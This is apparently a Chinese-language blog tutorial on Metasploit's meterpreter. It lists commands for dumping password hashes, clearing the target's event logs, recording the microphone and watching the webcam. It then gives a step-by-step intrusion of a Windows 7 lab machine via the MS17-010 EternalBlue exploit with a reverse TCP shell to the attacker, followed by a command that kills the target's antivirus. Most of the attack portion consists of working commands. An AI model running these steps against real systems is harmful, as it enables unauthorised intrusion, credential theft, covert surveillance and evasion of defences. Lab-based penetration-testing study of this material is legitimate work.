meterpreter是一个高级、动态、可扩展的payload 采用完全基于内存的DLL注入式payload help 查看帮助信息 background 退出当前会话 run 运行一个meterpreter脚本或者post模块(目标主机屏幕会显示) bgrun 在后台运行一个meterpreter脚本或者post模块 cd 切换目录 ls 列出当前目录所含文件及子目录 dir 列出当前目录所含文件及子目录 pwd 查看当前所在目录 cat 查看文件具体内容 mkdir 新建文件夹 mv 移动文件或文件夹 rm 删除文件 rmdir 删除文件夹 edit 编辑文件 lpwd 查看kali当前所在目录 lcd 切换kali本机目录 clearev 清除靶机日志 download 从靶机上下载文件到本机 upload 上传文件到靶机 excute 使用命令让靶机运行软件 getuid 查看uid getsystem 获得system权限 getprivs 查看自己当前的权限 getproxy 查看浏览器代理 getpid 查看meterpreter注入操作系统进程的pid migrate 更改注入的pid hashdump 以hash的形式展示密码 sysinfo 查看系统基本信息 ps 查看系统进程 kill 结束进程 reboot 重新启动靶机 shutdown 关闭靶机 shell 获取靶机shell show_mount 查看靶机磁盘基本信息 search 在靶机上搜索指定文件 arp 查看arp列表 netstat 查看靶机网络连接情况 ipconfig 查看靶机IP地址 ifconfig 查看靶机IP地址 route 查看靶机路由表 idletime 查看目标操作系统空闲时间 resource 执行含有meterpreter命令的文件 record_mic 记录靶机麦克风的声音 webcam_list 列出靶机摄像头列表 wecam_chat 开启靶机摄像头,在kali开始监视端 1.利用ms17_010(永恒之蓝)入侵windows7靶机。 use exploit/windows/smb/ms17_010_eternalbiue 2.设置靶机IP地址 set rhost 192.168.3.28 3.使用 meterpreter反向tcp连接payload。 set payload windows/meterpreter/reverse_tcp 4.设置回连IP地址 set lhost 192.168.3.26 5.执行命令,开始入侵。 run 1.当获得meterpreter时,输入bgrun,按回车键,然后就可以看到可执行的模块。 2.比如运行关闭杀毒软件,有利于我们对靶机进一步控制。 bgrun killav 1.meterpreter还支持python扩展,首先我们安装python。 load python 2.安装成功后我们运行”help”命令,可以在最后面看到关于python的用法 到此就完成了meterpreter的命令以及用法介绍,如果想了解更多的Kali工具,请关注我! meterpreter介绍
meterpreter命令介绍
流程需求
实例演示-利用meterpreter入侵系统
实例演示-bgrun命令运用
python扩展
本网页所有视频内容由 imoviebox边看边下-网页视频下载, iurlBox网页地址收藏管理器 下载并得到。
ImovieBox网页视频下载器 下载地址: ImovieBox网页视频下载器-最新版本下载
本文章由: imapbox邮箱云存储,邮箱网盘,ImageBox 图片批量下载器,网页图片批量下载专家,网页图片批量下载器,获取到文章图片,imoviebox网页视频批量下载器,下载视频内容,为您提供.
阅读和此文章类似的: 全球云计算